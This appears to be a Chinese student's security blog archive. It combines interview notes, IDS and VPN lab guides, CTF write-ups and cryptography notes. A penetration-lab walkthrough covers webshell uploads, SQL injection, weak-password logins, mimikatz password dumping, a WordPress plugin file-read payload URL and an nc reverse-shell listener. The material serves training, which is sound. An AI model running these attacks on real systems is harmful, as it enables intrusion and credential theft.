+++学校图书馆借了一本书《渗透测试完全初学者指南》,讲的很基础,对初学者很友好,略作笔记。
+
时间:2021-3-30
+时长:45min
+面试类型:电话面试
+目前为止遇到的最专业最耐心的面试官。 (也是最难的一次面试)
+我是点进22届暑期实习投的,却发现投的是正式职位。。。啊,这。
+面试内容如下:
+1.自我介绍
+2.WAF及其绕过方式
+3.IPS/IDS/HIDS
+4.云安全
+5.怎么绕过安骑士/安全狗等
+6.Gopher扩展攻击面
+7.Struct2漏洞
+8.UDF提权
+9.DOM XSS
+10.数据库提权
+11.怎么打Redis
+12.内网渗透
+13.容器安全
+14.k8s docker逃逸
+15.linux、windows命令:过滤文件、查看进程环境变量
+16.站库分离怎么拿webshell
+总之,面试官很专业,循循善诱,可惜自己实战经验太少,很多问题答不上。
+继续努力。加油少年!
+时间:2021-4-5
+时长:25min
+面试过程
+1.自我介绍
+2.SQL注入经常使用什么函数
+3.渗透测试的流程
+4.关于云安全
+5.关于ISO 27001 风险评估
+6.讲一下SSRF
+7.还了解什么漏洞
+8.同源策略
+9.Linux相关
+10.机器学习相关
+因为简历上有写NLP自然语言处理。
+绿盟的面试体验很好,问的也都是基础的,和简历相关的。
+计算机网络安全是一个国际化的问题,每年全球因计算机网络的安全系统被破坏而造成的经济损失达数百亿美元以上,这个数字还在不断增加。政府、银行、大企业等机构都有自己的内网资源。从网络安全的角度看,当公司的内部系统被入侵、破坏与泄密是一个严重的问题。据统计,全球80%以上的入侵来自于内部。由于性能的限制,防火墙通常不能提供实时的入侵检测能力,对于企业内部人员所做的攻击,防火墙形同虚设。因此,如何有效抵御网络入侵和攻击,已成为世界各国国家安全的重要组成部分,也是国家网络经济健康有序发展的关键。
+入侵检测被认为是防火墙之后的第二道安全闸门,入侵检测系统能使在入侵攻击对系统发生危害前,检测到入侵攻击,并利用报警与防护系统驱逐入侵攻击,在不影响网络性能的情况下能对网络进行监听,从而提供对内部攻击、外部攻击和误操作的实时保护,大大提高了网络的安全性。
+入侵检测实验通过企业复杂网络环境的入侵检测操作实战,要求学生深刻理解入侵检测和的概念、原理,进而熟悉入侵检测系统的功能,掌握常用的入侵检测技术和方法,最终具备娴熟的入侵检测能力和信息安全管理职业能力,能够胜任政府、金融、电商等企事业单位的信息安全系统设计、研究、管理等工作,并为国家网络空间安全事业做出应有的贡献。
+任务一 在不同的操作系统环境下安装和配置OSSEC代理,构建入侵检测环境;
任务二 监视OSSIM服务器本地root用户的登录情况;
任务三 基于SSH的远程非法入侵检测;
任务四 监视CentOS7 root用户情况;
任务五 监控Web服务器的访问日志。
1.掌握在不同的操作系统环境下安装和配置OSSEC代理。
2.了解工具PuTTY的基本功能,掌握使用该工具远程连接机器的方法。
3.通过安装OSSEC代理,掌握PuTTY工具的实验,掌握配置OSSEC代理的方法,了解OSSEC入侵检测系统的架构、功能以及实现方式,具备构建入侵检测环境的能力。
4.掌握OSSIM系统的入侵检测规则设置方法,并能够根据报警信息做入侵行为分析,具备信息系统入侵检测和防范、维护系统安全的职业能力。
入侵检测(Intrusion Detection,ID), 顾名思义,是对入侵行为的检测。它通过收集和分析计算机网络或计算机系统中若干关键点的信息,检查网络或系统中是否存在违反安全策略的行为和被攻击的迹象,以便决策者有效采取措施,以保证网络系统资源的机密性、完整性和可用性。
+入侵检测系统(intrusion detection system,简称“IDS”)是一种对网络传输进行即时监视,在发现可疑传输时发出警报或者采取主动反应措施的网络安全系统。它与其他网络安全设备的不同之处便在于,IDS是一种积极主动的安全防护技术。
+OSSIM即开源安全信息管理系统(OPEN SOURCE SECURITY INFORMATION MANAGEMENT),是一个非常流行和完整的开源安全架构体系。OSSIM通过将开源产品进行集成,从而提供一种能够实现安全监控功能的基础平台。 它的目的是提供一种集中式、有组织的、能够更好地进行监测和显示的框架式系统。
+OSSIM明确定位为一个集成解决方案,其目标并不是要开发一个新的功能,而是利用丰富的、强大的各种程序(包括Snort、Rrd、Nmap、 Nessus以及Ntop等开源系统安全软件)。在一个保留他们原有功能和作用的开放式架构体系环境下,将他们集成起来。而OSSIM项目的核心工作在于负责集成和关联各种产品提供的信息,同时进行相关功能的整合。由于开源项目的优点,这些工具已经是久经考验,同时也经过全方位测试、是可靠的工具。
OSSEC是一个运行在OSSIM系统中的开源的入侵检测系统,从架构上看它属于C/S架构,从功能上看它可以执行日志收集与分析、完整性检测、rootkit检测、蠕虫检测、Windows注册表和实时报警等任务。它不仅支持OSSIM本身,还可以在UNIX、Linux、Mac、Windows系统中运行。由于OSSEC Server端就安装在OSSIM系统中,并和iptables实现了联动功能,因此只需在客户端安装代理即可,也就是通过OSSEC Server+Agent方式,以实现HIDS系统功能。
OSSIM系统中的HIDS(Host-based Intrusion Detection System,简称HIDS,即基于主机型入侵检测系统。作为计算机系统的监视器和分析器,它并不作用于外部接口,而是专注于系统内部,监视系统全部或部分的动态的行为以及整个计算机系统的状态。)通过安装在其他操作系统上的Agent程序来审计操作系统以及用户的活动,比如用户的登录、命令操作、软件升级、系统文件的完整性、应用程序使用资源情况等,根据主机行为特征确定是否发生入侵行为,并把警报信息发送给OSSIM上的OSSEC Server。这种HIDS可以精确地分析入侵活动,能确定是哪一个用户或者进程对系统进行过攻击。
+OSSIM系统的工作流程为:
+1 | (1)作为整个系统的安全插件的探测器(Sensor)执行各自的任务,当发现问题时给予报警。 |
| 操作系统 | +IP地址 | +服务器角色 | +登录账户密码 | +
|---|---|---|---|
| OSSIM | +192.168.1.200 | +OSSEC Server | +用户名:root;密码:Simplexue123 | +
| CentOS7 | +192.168.1.6 | +OSSEC Agent | +用户名:root;密码:Simplexue123 | +
| Windows 2012 | +192.168.1.5 | +OSSEC Agent | +用户名:administrator;密码:Simplexue123 | +
1.安装OSSEC HIDS
+
2.配置
+
3.在windows2012操作系统(服务器IP地址:192.168.1.5)中,使用putty远程登录OSSIM服务器
+
4.使用putty终端启动OSSEC代理管理程序,创建新OSSEC代理
+
5.通过CentOS7终端SSH远程登录OSSIM服务器
+
2.1在windows2012上使用火狐浏览器访问OSSIM集成监测平台Web GUI界面,输入用户名admin和密码Simplexue123进行登录。
+
2.2 OSSIM系统已经默认设置了很多常规适用的入侵检测规则,我们不需要另行配置就可以直接使用。除此之外,我们还需要在OSSIM集成检测平台上通过修改ossec.conf规则配置文件来设置OSSEC系统的入侵检测规则。在OSSIM web页面中,单击Analysis—>Detection—>HIDS—>Config—>Ossec.conf,可以看到OSSIM集成检测平台已经默认监视了日志文件/var/log/auth.log。如果在Ossec.conf文件中没有找到关于auth.log的监控信息,请自行添加该部分内容的规则配置信息。
+
2.3重启OSSIM服务器,重启登录成功后进入图形操作界面,按Ctrl+Alt+F1切换到命令行界面,输入用户名root和密码Simplexue123进行登录,再输入命令exit退出登录,之后按Ctrl+Alt+F7回到图形界面。图形界面和命令行界面的切换登录是为了给OSSEC入侵检测系统提供OSSIM服务器的root用户本地登录检测信息源,以便OSSEC系统获取root用户本地登录的相关日志信息。
+2.4在windows2012上远程连接到服务器192.168.1.200。
+
2.5在windows2012的OSSIM Web页面上,单击Analysis—> Security Events (SIEM),可以看到,Security Events页面中列出了OSSIM系统预设检测规则适用范围内的所有安全事件日志信息,可以找到通过putty远程登录时相关的SSH登录记录报警信息。该日志信息可作为系统管理员判断本次远程登录是否为非法入侵的重要报警信息。如果OSSIM服务器不允许root用户的远程登录操作,那么root用户的本次远程登录操作将被视为黑客入侵行为。
+
2.6在OSSIM web页面搜索框输入ossec,回车进行ossec报警数据过滤。
+
2.7因为OSSEC入侵检测系统监控了/var/log/auth.log文件,所以在OSSIM集成检测平台的OSSIM Web页面,除了记录SSH远程登录的相关安全日志信息,还会记录OSSEC报警信息,该报警信息可作为判断本次远程登录是否为非法入侵的重要依据。
+3.1使用putty工具远程登录OSSIM服务器,在打开的终端中,使用CD命令进入“/var/ossec/rules”目录(该目录为OSSEC服务器的检测规则文件存储目录),并使用ls命令查看所有的OSSEC服务器端检测规则文件。可以修改这些文件的预设规则配置,来实现用户需要的自定义系统安全检测规则。其中,sshd_rules.xml为我们本实验任务需要自定义检测规则的文件,通过自定义规则,以实现收集root用户远程非法登录OSSIM服务器的报警信息的目的,为判定、分析入侵行为和动机提供重要依据。
+
3.2修改sshd_rules.xml规则文件中的其中一条(rule id号为5719),将level级别设置为2(level级别越高,优先级就越高,与该规则对应的报警信息将更优先被OSSIM服务器响应和处理),告警阈值设置为2次。该规则表示:当非法用户存在2次以上远程登录尝试操作,且操作时间超过30秒,那么将触发非法远程登录尝试报警。修改完sshd_rules.xml文件后保存并退出编辑状态。
+4.1在OSSIM集成检测平台上设置规则,监测CentOS7用户情况。在CentOS7终端查看代理的配置文件,可以看到OSSIM集成检测平台默认监控/var/log/secure文件,如果没有该文件监控内容,请自行添加。
+
4.2重启OSSIM服务器(192.168.1.200)。
+
4.3使用工具模拟攻击者远程登录服务器(用户名root和密码Simplexue123)。
+4.4在服务器终端输入命令“adduser simpleware”、“passwd simpleware”,添加新用户simpleware,并将其密码设为Simplexue123。
+
4.5回到OSSIM Web页面上,进行OSSEC警报数据的过滤,可以看到与CentOS7添加新用户相关的OSSEC报警信息。
+
4.6查看入侵检测系统检测到的报警信息,获得报警信息的字段特征。
+
因此OSSIM集成监测平台web页面中监测到的OSSEC代理新建用户的报警信息的signature:ossec:New user added to the system
+5.1在CentOS7的终端修改ossec.conf文件,向该文件中添加如下内容,实现监控Web服务器的访问日志的功能。编辑完后按esc键退出文件编辑状态,并输入:wq命令保存文件。
+
5.2在终端输入命令“/var/ossec/bin/ossec-control restart”,重新启动OSSEC服务。
+
5.3在windows2012上访问被禁止访问的目录。在windows2012(IP为192.168.1.5)的火狐浏览器上新打开一个页面,访问http://192.168.1.6/dvwa/config,提示信息为Not Found。
+
5.4回到OSSIM Web页面上,进行OSSEC警报数据的过滤,可以看到访问禁止目录时的报警信息。
+通过此次实验:
+1.掌握在不同的操作系统环境下安装和配置OSSEC代理。
2.了解工具PuTTY的基本功能,掌握使用该工具远程连接机器的方法。
3.通过安装OSSEC代理,掌握PuTTY工具的实验,掌握配置OSSEC代理的方法,了解OSSEC入侵检测系统的架构、功能以及实现方式,具备构建入侵检测环境的能力。
4.掌握OSSIM系统的入侵检测规则设置方法,并能够根据报警信息做入侵行为分析,具备信息系统入侵检测和防范、维护系统安全的职业能力。
虚拟专用网(VPN)被定义为通过一个公用网络(通常是因特网)建立一个临时的、安全的连接,是一条穿过混乱的公用网络的安全、稳定的隧道。虚拟专用网是对企业内部网的扩展。虚拟专用网可以帮助远程用户、公司分支机构、商业伙伴及供应商同公司的内部网建立可信的安全连接,并保证数据的安全传输。虚拟专用网可用于不断增长的移动用户的全球因特网接入,以实现安全连接;可用于实现企业网站之间安全通信的虚拟专用线路,用于经济有效地连接到商业伙伴和用户的安全外联网虚拟专用网。
+任务一 使用IP命令搭建基于隧道的虚拟专有网络
任务二 使用加密工具OpenSSL创建加密密钥
任务三 SSL VPN之OpenVPN的安装配置
任务四 IPsecVPN原理及安装配置
任务五 云计算中基于Overlay技术的隧道网络实现
掌握如何搭建基于隧道的虚拟专有网络
掌握加密算法了解及其应用
掌握如何安装部署配置openvpn服务端与客户端
掌握IPsecVPN原理及安装部署
了解公有云中overlay的实现
| 操作系统 | +IP地址 | +服务器角色 | +登录账户密码 | +
|---|---|---|---|
| Windows2012 | +192.168.0.11 | +操作机 | +用户名:administrator;密码:Simplexue123 | +
| centos7_1 | +192.168.1.11 | +目标机 | +用户名:root;密码:Simplexue123 | +
| centos7_2 | +192.168.2.11 | +目标机 | +用户名:administrator;密码:Simplexue123 | +
使用IP命令搭建基于隧道的虚拟专有网络
+实现两不同网络内的内网通过ip隧道使之互通并检测。
+
+
+修改主机名
+1 | # hostnamectl set-hostname vpn1 |
1 | [root@vpn1 ~]# modprobe ip_gre |
加载ip_gre内核模块
+
配置tunnel(GRE隧道)使它们互通
+1 | [root@vpn1 ~] ip tunnel add gre1 mode gre remote 192.168.2.11 local 192.168.1.11 ttl 255 |
启动gre1并分配ip地址10.10.10.1
+vpn2创建一个GRE类型隧道设备gre1, 并设置对端IP为192.168.1.11
+测试隧道是否通
+
最后卸载GRE模块。
+使用加密工具OpenSSL创建加密密钥
+查看帮助信息
+
生产RSA私钥
+生成rsa_private.key私钥对应的公钥
+生成RAS含密码(使用aes256加密)公私钥
+1 | [root@vpn1 ~]# openssl genrsa -aes256 -passout pass:simple -out rsa__aes_private.key 2048 |
加密与非加密之间的转换
+生成 RSA 私钥和自签名证书
+
SSL VPN之OpenVPN的安装配置
+【任务描述】
本实验任务基于真实企业网络环境,在两台台服务器搭建的典型企业局域网环境中,主要完成以下内容:
(1)搭建openvpn服务端与客户端。
(2)实现客户端可访问服务端机器
【实验目标】
1.了解企业级别openvpn的使用场景。
2.掌握企业级别openvpn搭建和使用。
3.掌握openvpn客户端与服务端的搭建配置。
在vpn1机器安装openvpn并验证
+1 | [root@vpn1 ~]# yum clean all |
修改openvpn的配置文件server.conf配置文件的内容
+
修改openvpn服务端的配置文件
+设置启动用户
+安装密钥生成软件
+配置生成证书的环境变量.并使之生效
+1 | systemctl start |
1 | systemctl enable |
1 | systemctl status |
启动openvpn客户端并挂后台运行
+
查看网卡信息
+openvpn nat配置
+【任务描述】
本实验任务基于真实企业网络环境,在两台台服务器搭建的典型企业局域网环境中,主要完成以下内容:
(1)搭建ipsec服务端与客户端。
(2)实现客户端可访问服务端机器
【实验目标】
1.了解企业级别ipsec的使用场景。
2.掌握企业级别ipsec搭建和使用。
3.掌握ipsec客户端与服务端的搭建配置。
4.掌握ipsec多种验证方式的实现
添加配置文件
+1 | [root@vpn1 ~]# vim /etc/sysctl.conf |
安装openswan、libreswan并验证安装
+启动服务看是否正常
+1 | [root@vpn1 ~]# yum install openswan libreswan -y |
两端重新启动服务,并验证
+1 | [root@vpn1 ~]# systemctl restart ipsec.service |
在VPN1和VPN2上分别生成一个新的RSA密钥对
+1 | conn net-to-net |
1 | [root@vpn1 ~]# systemctl restart ipsec.service |
【任务描述】
本实验任务基于真实企业网络环境,在两台台服务器搭建的典型企业局域网环境中,主要完成以下内容:
(1)搭建overlay网络实现不同宿主机之间同网段机器相通。
(2)检测网络联通性。
【实验目标】
1.了解overlay网络的使用场景。
2.掌握overlay搭建和使用。
3.掌握openvswitch的使用。
在VPN1和VPN2分别安装openvswitch并启动服务
+1 | [root@vpn1 ~]# yum install openvswitch -y |
启动服务
+1 | [root@vpn1 ~]# systemctl start openvswitch.service |
配置VPN1,2
+搭建VXLAN隧道
+1 | ifconfig br0 10.1.0.2/24 up |
1 | ovs-vsctl add-port br0 vx1 -- set interface vx1 type=vxlan options:remote_ip=192.168.1.11 |
本实验的任务是通过外网的主机通过代理渗透到内网的主机。在渗透的过程中一般需要先进行端口扫描猜测主机上运行的服务,再通过漏洞利用脚本和其他扫描工具进一步确定漏洞存在,进而完成主机渗透拿到权限。
+本实验的任务是通过外网的主机通过代理渗透到内网的主机。在渗透的过程中一般需要先进行端口扫描猜测主机上运行的服务,再通过漏洞利用脚本和其他扫描工具进一步确定漏洞存在,进而完成主机渗透拿到权限。
+1 | 爆破web网站后台,进入后台上传webshell |
| 操作系统 | +IP地址 | +服务器角色 | +登录账户密码 | +
|---|---|---|---|
| Windows7 | +192.168.1.200 | +操作机 | +用户名:administrator;密码:Simplexue123 | +
| centos 7 | +192.168.1.10 | +目标机 | +用户名:root;密码:Simplexue123 | +
| Windows2012 | +192.168.2.10 | +目标机 | +用户名:administrator;密码:Simplexue123 | +
| Windows2012 | +192.168.2.11 | +目标机 | +用户名:administrator;密码:Simplexue123 | +
描述:
+1 | 使用wwwscan扫描网站后台目录,利用Burpsuite工具爆破网站后台用户名密码,获取cms的管理员密码登录后台。 |
首先打开网页查看
+
发现是织梦CMS
+使用wwwscan爆破网站后台目录
+
发现后台登陆:manager/login.php
+
填写密码,使用bp抓包
+
选择密码字典爆破
+
成功:admin:1q2w3e4r
+
登陆成功并上传一句话木马
+
打开中国菜刀并进行连接
+
1 | 利用之前扫描目录得到的结果访问到测试的sql页面,利用SQL注入漏洞获得网站数据库信息 |
1 | 访问/sql目录,利用SQL注入漏洞获取网站数据库基本信息,如当前使用的数据库用户等。 |
读取配置文件
+使用双写绕过
+
向/var/www/html写入一句话木马
+
菜刀连接,并获取flag
+1 | 利用之前扫描目录得到的结果访问到phpmyadmin的页面,利用弱口令登录到phpmyadmin服务中。 |
使用弱口令登陆
+root,root
+
1 | 上传内网扫描的脚本到web的机器上,并对内网192.168.2.0/24段进行扫描 |
1 | 利用已经登录到远程桌面的机器,上传mimikatz工具抓取机器内存中的密码。 |
操作机的操作系统是kali 进入系统后默认是命令行界面 输入startx命令即可打开图形界面。
+所有需要用到的信息和工具都放在了/home/Hack 目录下。
+本实验的任务是通过外网的两个主机通过代理渗透到内网的两个主机。在渗透的过程中一般需要先进行端口扫描猜测主机上运行的服务,再通过漏洞利用脚本和其他扫描工具进一步确定漏洞存在,进而完成主机渗透拿到权限。
+Weblogic的java反序列漏洞应用
Wordpress任意文件读取的漏洞利用
Wordpress命令执行的漏洞利用
WordPress通过自己修改的EXP,getshell
通过代理扫描内网
Redis未授权访问以及对配置文件的理解
Ffmpeg任意文件的读取结合redis的利用
Drupal由于YAML解析器处理不当导致远程代码执行
| 操作系统 | +IP地址 | +服务器角色 | +登录账户密码 | +
|---|---|---|---|
| Kali Linux | +192.168.2.10 | +操作机 | +用户名:root;密码:Simplexue123 | +
| Centos 7 | +192.168.2.11 | +目标机 | +用户名:root;密码:Simplexue123 | +
| Centos 7 | +192.168.1.10 | +目标机 | +用户名:root;密码:Simplexue123 | +
| Centos 7 | +192.168.1.11 | +目标机 | +用户名:root;密码:Simplexue123 | +
| Centos 7 | +192.168.2.200 | +目标机 | +用户名:root;密码:Simplexue123 | +
1 | 整体扫描外部网络,探测暴露在外部的主机信息 |
实验目的
+通过完成本实验任务,要求学生掌握利用java反序列化漏洞利用脚本攻击weblogic服务的技术。掌握weblogic服务的常见端口,启动jar程序的方法和攻击weblogic的流程、方法和技巧,为完成后续企业渗透实验任务奠定坚实的漏洞利用技术基础。
+打开kal操作机
+访问192.168.2.10:7001
+
+
+打开home/HACK目录下的工具
+
+
+
+
+输入HOST、端口、以及CMD命令
+
+
+点击connect并执行
+根据提示,找到/home/flag下的flag.txt文件
+
+
+任务内容:
+1 | 使用wpscan工具扫描wordpress的插件漏洞 |
利用wpscan扫描wordpress网站,扫描漏洞插件
+命令:wpscan –url 192.168.2.11 –enumerate p
+
+
+发现插件存在漏洞
+根据提示直接上payload
+http://192.168.2.11/wp-content/plugins/wp-hide-security-enhancer/router/file-process.ph p?action=style-clean&file_path=/wp-config.php
+得到flag
+
任务内容:
+1 | 利用Burpsuite的repeater模块修改包探测漏洞存在的字段。 |
操作步骤
+1 | 访问目标网站,在浏览器中配置代理,用Burpsuite拦截请求包 |
首先找到登陆入口
+
+
+对firefox及burpsuite设置代理,拦截请求。
+
利用提供的脚本getshell,获得flag
+实验目标
+1 | 了解网络安全漏洞的概念以及现有的安全漏洞扫描工具。认知常见网络安全漏洞。 |
实验步骤
+1 | 查看漏洞利用脚本wordpress-rce-exploit.sh理解脚本改进的原理。 |
+
+首先查看脚本内容
+修改recv_host=”192.168.2.200”
+设置监听端口
+nc –lvvp 7777
+反弹shell
+任务内容:
+1 | 查看网页中的信息可知,是通过ffmpeg处理视频的小应用,只有上传,下载和删除功能,此处存在ffmpeg文件读取漏洞,构造特定的avi视频,经过ffmpeg处理之后的视频就会包含想要的文件内容。利用文件读取漏洞获取redis配置文件内容。 |
1 | 使用浏览器挂代理访问内网机器192.168.1.10。 |
实验目标
+1 | 了解网络安全漏洞的概念以及现有的安全漏洞扫描工具。认知常见网络安全漏洞。 |
操作步骤
+1 | 使用浏览器结合proxychains用之前的代理访问内网中的drupal8的web应用。 |
然后利用exp写入webshell
+
中国菜刀连接,即可获得flag。
+适合新手的题,练练手
+
+
+打开环境,是一个投票页面
+
+
+题目要求:在20秒之内让左边的票数高过右边的
+查看源码
+
+
+是JS编码
+ +打开在线网站,直接提交这串编码即出flag
+++JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.
+It does not depend on a browser, so you can even run it on Node.js.
+Use the form below to convert your own script. Uncheck “eval source” to get back a plain string.
+
+
+查看robots.txt
+
继续查看code.txt
+出现一串PHP代码
+1 |
|
根据正则表达以GET型提交即可。
+注意是在根目录下提交GET请求。
+
题目描述:ISCC客服一号冲冲冲(二)
+
+
+打开之后是个伪装的登录框(其实是图片)
+但是图片显示不完整
+| 值 | +描述 | +
|---|---|
| visible | +默认值。内容不会被修剪,会呈现在元素框之外。 | +
| hidden | +内容会被修剪,并且其余内容是不可见的。 | +
| scroll | +内容会被修剪,但是浏览器会显示滚动条以便查看其余的内容。 | +
| auto | +如果内容被修剪,则浏览器会显示滚动条以便查看其余的内容。 | +
| inherit | +规定应该从父元素继承 overflow 属性的值。 | +
根据 CSS 布局 - Overflow,可以看出图片的完整部分。
+下载图片,并进行LSB隐写破解和压缩文件隐藏破解,发现行不通。
+根据之前题目得到的flag进行POST提交
+
修改admin
+
根据网上的提示,查看cookie,
+CBC翻转攻击
+
打开网页,是4张猫猫图片
+
+
+根据题目描述,这是一个ssti模板注入
+这只猫叫小豆泥
+信息收集:xiaodouni
+
+
+题目:Explore Ruby
+打开之后是个登录框
+尝试万能密码和SQL注入都没成功
+然后尝试弱口令:test : test
+
+
+登录成功
+
图片地址是base64编码
+解密即可出flag
+
源码如下:
+1 |
|
1 | import requests |
马上就要高考了,受老师和同学之托,写一段加油的话给即将上高考战场的学弟学妹,也勉励未来的自己。
+++我们都不曾平庸,目的向来无关紧要,你所期待遇见的都在途中。所以啊,就把迷惘都写进诗里,在一路颠沛中弹奏成歌,在六月的阳光下高唱出来,惊起身后的鸥鸟,唱醒这早春的天,唱热你倔强的眼眶,唱遍你要去的地方。愿九月的你,生活在现在渴望的远方。
+
网址如下:
+ +想参与360众测活动,需要注册登陆,并完成考核。
+考核内容:
+1.选择题
+2.判断题
+3.实战题(分值最大)
+题目都比较简单,实战题是CTF形式,拿到一半以上的flag应该就可以通过了。
+主要题型如下:
+1.各种Web漏洞
+2.流量分析题
+比较简单,会用wireshark,分析简单的数据包就可以了。
+3.CMS
+针对特定CMS系统的分析题。
+4.CVE
+经典CVE的复现和分析。
+总结了几个常考的点:
+
+
+++补充信息安全数学基础,为密码学做点铺垫,学习一下初等数论
+
密码学中的数论基础
+学习安排
+++李卫海PPT学习笔记
+
Needham-Schroeder协议:
+利用对称密码技术分发密钥。A,B分别与T有静态密钥。借助信任权威T,分发对称密钥Kab
+多项式GCD算法
+重点:模重复平方算法
+1 | c=1 |
难点:AES列混合矩阵计算,有限域上的多项式模运算。
+对合算法
+对合运算:f =f‘ ,模 2加运算是对合运算。
密码算法是对和运算,则加密算法=解密算法,工程实现工
作量减半。
同态加密(英语:Homomorphic encryption)是一种加密形式,它允许人们对密文进行特定形式的代数运算得到仍然是加密的结果,将其解密所得到的结果与对明文进行同样的运算结果一样。换言之,这项技术令人们可以在加密的数据中进行诸如检索、比较等操作,得出正确的结果,而在整个处理过程中无需对数据进行解密。其意义在于,真正从根本上解决将数据及其操作委托给第三方时的保密问题,例如对于各种云计算的应用。
+零知识证明是一种特殊的交互式证明,其中证明者知道问题的答案,他需要向验证者证明“他知道答案”这一事实,但是要求验证者不能获得答案的任何信息。
+可以参考这样一个简单的例子。证明者和验证者都拿到了一个数独的题目,证明者知道一个解法,他可以采取如下这种零知识证明方法:他找出81张纸片,每一张纸片上写上1到9的一个数字,使得正好有9份写有从1到9的纸片。然后因为他知道答案,他可以把所有的纸片按照解法放在一个9乘9的方格内,使得满足数独的题目要求(每列、每行、每个九宫格都正好有1到9)。放好之后他把所有的纸片翻转,让没有字的一面朝上。这样验证者没办法看到纸片上的数字。接下来,验证者就验证数独的条件是否满足。比如他选一列,这时证明者就把这一列的纸片收集起来,把顺序任意打乱,然后把纸片翻过来,让验证者看到1到9的纸片都出现了。整个过程中验证者都无法得知每张纸片的位置,但是却能验证确实是1到9都出现了。
+字频统计攻击
+对凯撒密码,通过识别a-e-i或r-s-t三元组的峰,或jk和xyz的特征,可以获得密钥
+对单表替换密码,破译步骤:
+已知明文攻击(Known plaintext attack)是一种攻击模式,指攻击者掌握了某段明文 x 和对应密文 y。
+在所有密码分析中,均假设攻击者知道正在使用的密码体制,该假设称为科克霍夫假设。而已知明文攻击也假设攻击者能够获取部分明文和相应密文,如截取信息前段,通过该类型攻击获取加密方式,从而便于破解后段密文。
+希尔密码依赖唯密文攻击较难破解,而通过已知明文攻击则容易攻破。
+**选择明文攻击 **在这种攻击模式中,攻击者可以事先任意选择一定数量的明文,让被攻击的加密算法加密,并得到相应的密文。攻击者的目标是通过这一过程获得关于加密算法的一些信息,以利于攻击者在将来更有效的破解由同样加密算法(以及相关密钥)加密的信息。在最坏情况下,攻击者可以直接获得解密用的钥匙。
+这种攻击模式初看起来并不现实,因为很难想像攻击者可以选择任意的信息并要求加密系统进行加密。不过,在公钥密码学中,这就是一个很现实的模式。这是因为公钥密码方案中,加密用的钥匙是公开的,这样攻击者就可以直接用它来加密任意的信息。
+选择密文攻击 在密码分析中,选择密文攻击指的是一种攻击方式。攻击者掌握对解密机的访问权限,可构造任意密文所对应的明文x。在此种攻击模型中,密码分析者事先任意搜集一定数量的密文,让这些密文透过被攻击的加密算法解密,透过未知的密钥获得解密后的明文。
+唯密文攻击指的是在仅知已加密文字(即密文)的情况下进行攻击。此方案可同时用于攻击对称密码体制和非对称密码体制。
唯密文攻击所希望达到的目的包括几种,依照成功的程度排列:
取得原始明文中的部分资讯。
取得原始明文。
得知解密用的钥匙。
穷举法是属于一种唯密文攻击,但一般在设计算法时都会考虑到穷举法。
一次性密码本(英语:one-time pad,缩写为OTP)是古典密码学中的一种加密算法。是以随机的密钥(key)组成明文,且只使用一次。
+在理论上,此种密码具有完善保密性,是牢不可破的。它的安全性已由·香农所证明。
+虽然它在理论上的安全性无庸置疑,但在实际操作上却有着以下的问题:
+用以加密的文本,也就是一次性密码本,必须确实是随机产生的。
它至少必须和被加密的文件等长。
用以加密的文本只能用一次,且必须对非关系人小心保密,不再使用时,用以加密的文本应当要销毁,以防重复使用。
生日攻击 生日攻击是一种密码学攻击手段,所利用的是概率论中生日问题的数学原理。这种攻击手段可用于滥用两个或多个集团之间的通信。此攻击依赖于在随机攻击中的高碰撞概率和固定置换次数(鸽巢原理)。攻击者可在
+
中找到散列函数碰撞,2^n 为原像抗性安全性。
+重合指数法:所有字母出现概率的平方的和接近0.065,这个值称为重合指数。
+数据扩散:改变明文的任何一位,密文通常有一半的位数发生变化。
+数据混淆:改变密钥的任何一位,密文通常有一半的位数发生变化。
+所谓扩散就是让明文中的每一位影响密文中的许多位,或者说让密文中的每一位受明文中的许多位的影响.这样可以隐蔽明文的统计特性.当然,理想的情况是让明文中的每一位影响密文中的所有位,或者说让密文中的每一位受明文中所有位的影响.
所谓混淆就是将密文与密钥之间的统计关系变得尽可能复杂,使得对手即使获取了关于密文的一些统计特性,也无法推测密钥.使用复杂的非线性代替变换可以达到比较好的混淆效果,而简单的线性代替变换得到的混淆效果则不理想.
仿射密码
+
+
+代换密码要先建立一个替换表(即密钥),加密时将需要加密的明文依次通过查表,替换为相应的字符,明文字符被逐个替换后,生成无任何意义的字符串,即密文。
置换密码是对明文字符按某种规律进行位置的置换。
中间人攻击
+SP网络(代换-置换网络)
+Substitution-Permutation Network,缩写作SP-network或SPN
+S一般被称为混淆层,主要起混淆作用
P一般被称为扩散层,主要起扩散作用
代换起混淆作用,置换起扩散作用
+DES
+面向二进制数据的密码算法
因而能够加解密任何形式的计算机数据。
S盒起混淆作用
+改变S盒的任一输入比特,其输出至少有两比特发生改变
+置换运算P起扩散作用
+
+
+
+
+
+
+弱点
+
+
+AES
+面向二进制的密码算法
能够加解密任何形式的计算机数据。
不是对合运算,加解密使用不同的算法
最后一轮的轮变换中没有列混合变换。
+
+
+
+
+
+
+密钥备份和恢复只能针对加解密密钥,无法对签名密钥进行备份。
+密码体制的基本要素:
+密码系统的数学描述:
+S={P,C,K,E,D} 其中,明文空间P也常用消息空间M
+
现代密码学基本原则:
+密码提之的安全性:
+通信信道加密方式:
+存储数据的加密:
+攻击方法
+| 攻击类型 | +密码分析员的资源 | +
|---|---|
| 唯密文攻击 Ciphtext-only | +密码算法 待分析密文 | +
| 已知明文攻击 Known-plaintext | +密码算法 待分析密文 用同一密钥加密的一个或多个明文-密文对 | +
| 选择密文攻击 Chosen-ciphertext | +密码算法 待分析密文 可选择特定密文,并获得对应的明文 | +
| 选择明文攻击 Chosen-plaintext | +密码算法 待分析密文 可选择特定明文,并获得对应的密文 | +
| 选择文本攻击 Chosen-text | +密码算法 待分析密文 可选择特定密文/明文,并获得对应的明文/密文 | +
| 相关密钥攻击 Related-key | +密码算法 待分析密文 有确定关系的两个密钥对应的明文-密文对 | +
序列密码体制 / 流密码体制(Stream Cipher)
+分组密码体制(Block Cipher)
+根据密文的唯一性分类:
+明文:Plaintext,Message
+密文:Ciphertext
+目前,衡量一个密码系统是否安全的一个通用的做法是:公开接受来自全世界的研究和攻击。
+代换(Substitution)
明文内容的表示形式改变,内容元素之间相对位置不变
明文字母用密文中对应字母代替
置换(Transposition or Permutation)
明文内容元素的相对位置改变,内容的表示形式不变
乘积密码(Product Ciphers)
多个加密技术的叠加
1.移位密码
+凯撒密码
+将每个字母用字母表中它之后的第k个字母替代
C = E(k, p) = (p+k) mod 26, p = D(k, C) = (C-k) mod 26
一些文献中认为Caesar固定使用k=3
2.仿射密码
+密钥:a,b
加密:C = E([a,b], p) = (ap+b) mod 26
解密:p = D([a,b], C) = ((C-b)/a) mod 26
